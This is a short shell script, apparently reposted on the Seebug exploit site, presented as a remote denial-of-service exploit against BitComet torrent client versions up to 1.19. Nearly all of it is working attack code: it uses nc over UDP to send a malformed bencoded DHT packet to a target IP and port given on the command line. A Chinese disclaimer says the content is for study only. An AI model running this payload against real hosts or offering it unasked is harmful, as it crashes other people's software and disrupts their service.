#!/bin/sh # # BitComet <= 1.19 Remote DOS Exploit # Pierre Nogues - http://www.indahax.com/ # # Description: # BitComet is a torrent client # # BitComet doesn't handle malicious DHT packet with an invalid bencoded message. # # Affected versions : # BitComet <= 1.19 # # Plateforms : # Windows # # Usage : # ./exploit.sh ip port if [ $# -ne 2 ]; then echo "./exploit.sh ip port" exit 1 fi nc -u $1 $2 << . d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee .
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论